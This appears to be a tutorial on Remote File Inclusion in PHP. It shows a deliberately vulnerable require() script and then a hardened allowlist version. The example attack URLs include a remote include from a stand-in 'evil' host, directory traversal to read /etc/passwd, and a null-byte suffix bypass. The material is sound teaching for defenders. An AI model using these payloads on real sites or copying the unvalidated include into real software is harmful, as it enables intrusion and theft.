Remote File Inclusion is a technique used to attack websites from a remote computer. RFI allows malicious users to run their own PHP code on a vulnerable website. The attacker can use and run any remote file just by editing the URL. For example, a webshell can display the files and folders on the server, add, edit or delete files and folders, send spam, and even get hold of root.
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity it can also lead to, to list a few:
- Code execution on the web server
- Denial of Service (DoS)
- Data Theft/Manipulation
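Example
Consider this PHP script (which includes a file specified by request):
```php
<?php
   // Default template if the request does not specify one.
   $color = 'blue';
   // Vulnerable: the request value is used without any validation.
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   // The user-controlled string becomes part of the path passed to require().
   require( $color . '.php' );
?>
<form method="get">
   <select name="COLOR">
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>
```
Because the script passes the user-supplied COLOR parameter to require() without validation, it is possible to inject code from files: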
/vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system through directory traversal.
/vulnerable.php?COLOR=C:\\notes.txt - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, which disables the use of the NULL character.)
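A hardened counterpart to the script above, shown as an added example that is not part of the original page: the request value is only used as a lookup key into an allowlist, so it never becomes part of the path given to require(). The `colors` directory, the `red` entry and the function name `resolve_color_template` are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based replacement for the require() in vulnerable.php.
// Assumption: the valid templates are blue.php and red.php, stored in a
// "colors" directory next to this script (directory and "red" are hypothetical).

const COLOR_DIR = __DIR__ . '/colors';
const ALLOWED_COLORS = ['blue' => 'blue.php', 'red' => 'red.php'];

/**
 * Map the request value to a file path chosen by the application.
 * Returns null for anything that is not on the allowlist.
 */
function resolve_color_template($requested): ?string
{
    // Reject arrays (?COLOR[]=x) and any other non-string input.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: URLs, drive paths, "../" sequences and NUL bytes
    // are not keys of the allowlist, so they never reach require().
    if (!array_key_exists($requested, ALLOWED_COLORS)) {
        return null;
    }
    // The path is assembled only from constants defined in this file.
    return COLOR_DIR . '/' . ALLOWED_COLORS[$requested];
}

// Fall back to the default template when COLOR is absent.
$path = resolve_color_template($_GET['COLOR'] ?? 'blue');
if ($path === null) {
    // Fail closed: an unknown value is an error, not a reason to guess.
    http_response_code(400);
    exit('Unknown color');
}
require $path;
```

As defense in depth, keep `allow_url_include` set to Off in php.ini so that require() refuses remote URLs even if a validation bug slips through.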